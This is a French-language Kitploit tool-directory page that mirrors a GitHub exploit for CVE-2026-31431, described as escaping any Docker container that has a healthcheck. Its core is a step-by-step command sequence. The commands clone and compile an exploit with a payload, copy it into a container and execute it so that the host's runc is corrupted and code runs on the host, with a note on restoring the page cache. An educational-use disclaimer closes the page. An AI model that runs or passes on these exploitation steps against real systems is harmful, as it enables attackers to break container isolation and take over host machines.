Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-31431-Copy-Fail-Container-Escape — # Évasion de conteneur sur n'importe quel conteneur Docker avec healthcheck activé via CVE-2026-31431 | Kitploit
Outils/GitHubGitHub/hans362/cve-2026-31431-copy-fail-container-escape
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationSécurité CloudApprentissage et ÉducationÉvasion de Conteneur
GitHubhans362/cve-2026-31431-copy-fail-container-escape

CVE-2026-31431-Copy-Fail-Container-Escape

# Évasion de conteneur sur n'importe quel conteneur Docker avec healthcheck activé via CVE-2026-31431

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
2il y a 3 moisPas encore vérifié

CVE-2026-31431-Copy-Fail-Container-Escape

Démo

https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e

Prérequis

  • Conteneur vulnérable à la CVE-2026-31431
  • Healthcheck du conteneur configuré et commande du healthcheck connue
  • Accès root obtenu à l'intérieur du conteneur (si ce n'est pas le cas, vous pouvez simplement utiliser Copy Fail pour en obtenir un)

Dans ce dépôt, docker-compose.yml est fourni pour configurer un conteneur vulnérable. Vous pouvez également utiliser tout autre conteneur vulnérable ou configurer le vôtre, mais n'oubliez pas de modifier le code de l'exploit en conséquence.

Étapes de l'exploitation

root@kitploit:~
# Sur la machine hôte
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh

# À l'intérieur du conteneur copyfail
cd /tmp
chmod +x exp.sh exploit
./exp.sh

# Attendez quelques minutes que le healthcheck s'exécute
# et vérifiez si /tmp/pwned est créé sur l'hôte

# Sur la machine hôte
ls /tmp/pwned

Une fois l'exploit réussi, le pagecache du binaire runc sur la machine hôte est corrompu. Vous pouvez le restaurer en exécutant echo 3 | sudo tee /proc/sys/vm/drop_caches sur l'hôte.

Crédits

  • https://copy.fail/
  • https://github.com/tgies/copy-fail-c

Avertissement

Ce dépôt est uniquement destiné à des fins éducatives. Il ne doit pas être utilisé pour des activités malveillantes. L'auteur n'est pas responsable des dommages causés par une mauvaise utilisation de ce code. Utilisez-le toujours dans un environnement contrôlé et légal.

Télécharger l’outil